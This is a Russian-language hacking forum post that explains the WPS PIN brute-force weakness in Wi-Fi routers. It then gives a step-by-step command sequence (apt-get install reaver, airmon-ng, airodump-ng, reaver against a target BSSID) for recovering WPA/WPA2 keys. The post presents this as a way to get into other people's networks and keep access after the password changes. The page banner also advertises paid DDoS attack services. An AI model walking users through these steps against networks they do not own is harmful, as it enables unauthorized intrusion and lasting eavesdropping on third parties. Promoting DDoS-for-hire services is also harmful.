Перейти к содержимому

 Друзья: Всё для вебмастера | [ Реклама на форуме ]


Rutor
Rutor


[ DDos Услуги. DDos атака. Заказать ДДос ]


Взлом WPA/WPA2 сетей [Новый способ]

WPS flow via Reaver

  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1
###

###

    Экзабайт

  • Advanced
  • PipPipPipPipPipPip
  • 1743 сообщений
Теория:
27 декабря Department of Homeland Security's Computer Emergency Readiness Team сообщил о новой уязвимости в ВайФай роутерах. Уязвимым местом оказалась технология WPS (WiFi Protected Setup) реализованная почти во всех современных устройствах. Ее цель упростить процесс подключения между собой сетевых устройств, используя жестко вшитый в него пин код (часто этот пин указывается на самом роутере). Stefan Veihbock обнаружил уязвимость в самой технологии WPS, которая позволяет использовать атаку типа брутфорс против устройства. После 11,000 попыток можно получить этот самый пинкод. А зная его вы получаете и WPA ключи. Причем во многих роутерах нет возможности сменить этот код, что означает: однажды получив его, вы получаете карточку постоянного клиента, и сколько бы раз в последствии не менялся WPA ключ, вас это уже волновать не будет. И хоть эта уязвимость была известна уже около года, в паблик она попала только месяц назад, с релизом опенсурс продукта Reaver от компании Tactical Network Solutions.  

Практика:

1. Нужен Linux :) (показываю на примере debian way)
2. Устанавливаем reaver:
apt-get update
apt-get install reaver

3. Мониторим сеть
airmon-ng start wlan0

4. Выбираем цель
airodump-ng mon0

5. запускаем ривер
reaver -i moninterface -c channel -b bssid -vv

Warning: Один существенный минус: Долго брутит! процесс может занимать от 3 до 9 часов (может больше) + важно качество сигнала :)

Ссылки из под хайдов не выдаю!



Количество пользователей, читающих эту тему: 0

0 пользователей, 0 гостей, 0 анонимных